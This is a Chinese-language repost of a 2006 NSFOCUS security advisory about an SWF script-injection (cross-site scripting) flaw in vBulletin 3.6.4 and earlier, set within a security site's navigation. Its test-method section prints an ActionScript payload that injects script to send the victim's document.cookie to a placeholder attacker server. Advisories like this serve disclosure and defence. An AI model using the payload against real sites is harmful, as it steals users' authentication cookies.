联系站长
加入收藏
会员登陆
您的位置:
情长在线
>>
文章文献
>>
漏洞资料
>> By 情长在线(F.N.S.T)
□
vBulletin SWF脚本注入漏洞
热
vBulletin SWF脚本注入漏洞
[作者:佚名 转贴自:nsfocus 点击数: 更新时间:2006-12-27 文章录入:
一生情长
]
【字体:
A
】
vBulletin SWF脚本注入漏洞
更新日期:2006-12-26
受影响系统: VBulletin VBulletin <= 3.6.4描述: BUGTRAQ ID: 21736
vBulletin是一款开放源代码PHP论坛程序。
vBulletin在处理恶意SWF文件时存在漏洞,远程攻击者可能利用此漏洞获取用户机器的敏感信息。
如果攻击者能够向vBulletin上传包含有恶意actionscript帧的SWF文件的话,就可能执行跨站脚本攻击,导致在日志文件中泄露基于cookie的认证凭据。
<*来源:Ashraf Morad (ashraf1984@hotmail.com)
链接:
http://marc.theaimsgroup.com/?l=bugtraq&m=116707909711660&w=2
*>
测试方法: 警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
getURL("javascript:function blab(){}var scriptNode = document.createElement('script');document.getElementsByTagName('body')[0].appendChild(scriptNode);scriptNode.language='javascript';scriptNode.src='
http://www.YourServer/UrPHPpage.php?Cookie=
'+documents.cookie;blab();");
建议: 厂商补丁:
VBulletin
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.vbulletin.com/
上一篇文章:
W3M SSL证书格式串处理漏洞
下一篇文章:没有了
□
发表评论
□
告诉好友
□
打印此文
□
关闭窗口
最新10篇热点文章
NOD32 Anti-Virus多个文件…
[
221
]
Linux Kernel MinCore用户…
[
220
]
WinFtp服务器单字节溢出拒…
[
121
]
Broadcom Wireless Driver…
[
237
]
D-Link DWL-G132 Wireless…
[
262
]
Knownsoft Turbo Searcher…
[
178
]
NetGear WG311v1无线驱动超…
[
159
]
MailEnable IMAP服务远程缓…
[
273
]
Net-SNMP畸形TCP报文远程拒…
[
235
]
MS06-061 Microsoft Windo…
[
409
]
最新10篇推荐文章
D-Link DWL-G132 Wireless…
[
11-24
]
NetGear WG311v1无线驱动超…
[
11-24
]
Internet Explorer COM Ob…
[
09-15
]
Microsoft Windows NetpIs…
[
09-15
]
MS06-040:Microsoft Windo…
[
09-15
]
MDaemon USER Pre-Authent…
[
09-15
]
IE浏览器被迫连接某个网站…
[
08-16
]
防火墙”程序在日常使用中…
[
08-16
]
专家推荐五个免费的网络安…
[
07-20
]
10大严重安全问题及预防措…
[
07-18
]
相 关 文 章
◇
网友评论:(只显示最新5条。评论内容只代表网友观点,与本站立场无关!)
设为首页
加入收藏
关于本站
免费服务
广告服务
归档中心
站点地图
版权申明
联系站长
友情链接
Copyright© 2001-2005
F.N.S.T Fineacer.Org
.All Rights Reserved ICP备案:
粤ICP备05002156号